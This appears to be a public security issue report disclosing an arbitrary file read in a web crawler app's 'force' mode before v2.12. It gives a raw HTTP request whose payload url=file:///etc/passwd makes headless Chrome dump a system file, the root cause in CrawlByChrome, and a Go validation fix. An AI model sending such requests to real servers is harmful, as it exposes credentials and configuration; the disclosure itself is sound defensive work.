
Arbitrary file read vulnerability #175

@kaliworld

Description


This vulnerability is in edit mode, in the crawler's "force" mode; it affects versions before v2.12.

[screenshot]

Constructing a malicious link is enough to read a file.

[screenshot]

Request and response packets:

[screenshot]

Raw request:

```http
POST /crawl HTTP/1.1
Host: localhost:8181
Content-Length: 57
sec-ch-ua-platform: "Linux"
Accept-Language: en-US,en;q=0.9
sec-ch-ua: "Chromium";v="139", "Not;A=Brand";v="99"
sec-ch-ua-mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8181
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8181/api/test/edit/blank
Accept-Encoding: gzip, deflate, br
Cookie: bookstack=15c2b43f5cb53a04d6ae9737b884f845; login=P_-HAwEBDkNvb2tpZVJlbWVtYmVyAf-IAAEDAQhNZW1iZXJJZAEEAAEHQWNjb3VudAEMAAEEVGltZQH_hAAAABD_gwUBAQRUaW1lAf-EAAAAHP-IAQQBBHRlc3QBDwEAAAAO4LSkpC8mBO7-1AA=|1763880356791069263|8cfa193d2381ab70205ab44a2e28a10d773434aa
Connection: keep-alive

url=file:///etc/passwd&force=1&intelligence=0&diy=&type=2
```

Code analysis: the problem is in the util.go component. The CrawlByChrome function concatenates the URL directly without restricting the browser's URL scheme, placing urlStr straight into args = []string{"--headless", "--disable-gpu", "--dump-dom", "--no-sandbox", urlStr}:

[screenshot]

Impact:

This vulnerability allows an unauthorized attacker to read arbitrary files on the server, including sensitive configuration files, source code, logs, and system files that may contain confidential information.
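To make the root cause concrete, the following is an added example written for this issue, not code from the BookStack project itself. `buildChromeArgs` reproduces the argument list quoted above, where the caller-supplied string becomes the page headless Chrome dumps; `validateCrawlURL` is a hypothetical helper that shows the missing check: parse the input, accept only absolute `http`/`https` URLs with a host, and hand Chrome the re-serialised form rather than the raw string. The function names and the sample inputs in `main` are assumptions for illustration.

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
	"strings"
)

// ErrDisallowedURL is returned for any target that is not an absolute http/https URL.
var ErrDisallowedURL = errors.New("crawl target must be an absolute http or https URL")

// buildChromeArgs mirrors the argv quoted in the report: the caller's string is
// appended unchanged, so "file:///etc/passwd" is simply the page Chrome renders
// and prints with --dump-dom. This is the vulnerable shape, kept for contrast.
func buildChromeArgs(urlStr string) []string {
	return []string{"--headless", "--disable-gpu", "--dump-dom", "--no-sandbox", urlStr}
}

// validateCrawlURL is the check the vulnerable path lacks (hypothetical helper,
// not from the project). It rejects file://, javascript:, chrome://, data: and
// scheme-relative inputs before anything reaches the browser. net/url lowercases
// the scheme, so "FILE:///etc/passwd" is caught as well.
func validateCrawlURL(raw string) (string, error) {
	raw = strings.TrimSpace(raw)
	u, err := url.Parse(raw)
	if err != nil {
		return "", ErrDisallowedURL
	}
	switch u.Scheme {
	case "http", "https":
	default:
		return "", ErrDisallowedURL
	}
	if u.Hostname() == "" {
		return "", ErrDisallowedURL
	}
	// Re-serialise from the parsed form so the string Chrome receives is
	// exactly the one that was checked, not the caller's raw bytes.
	return u.String(), nil
}

// safeChromeArgs is the hardened counterpart: validate first, then build argv.
func safeChromeArgs(raw string) ([]string, error) {
	target, err := validateCrawlURL(raw)
	if err != nil {
		return nil, err
	}
	return buildChromeArgs(target), nil
}

func main() {
	// Constructed sample inputs: one legitimate target and several that
	// would otherwise be passed straight to Chrome.
	inputs := []string{
		"https://example.com/page",
		"file:///etc/passwd",
		"FILE:///etc/passwd",
		" file:///etc/passwd",
		"//example.com/page",
		"javascript:alert(1)",
	}
	for _, in := range inputs {
		args, err := safeChromeArgs(in)
		if err != nil {
			fmt.Printf("%-24q rejected: %v\n", in, err)
			continue
		}
		fmt.Printf("%-24q accepted: %v\n", in, args)
	}
}
```

A scheme allow-list stops the file read shown in this issue; whether the crawler should also be permitted to reach hosts on the server's own network is a separate policy question that this check does not answer.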
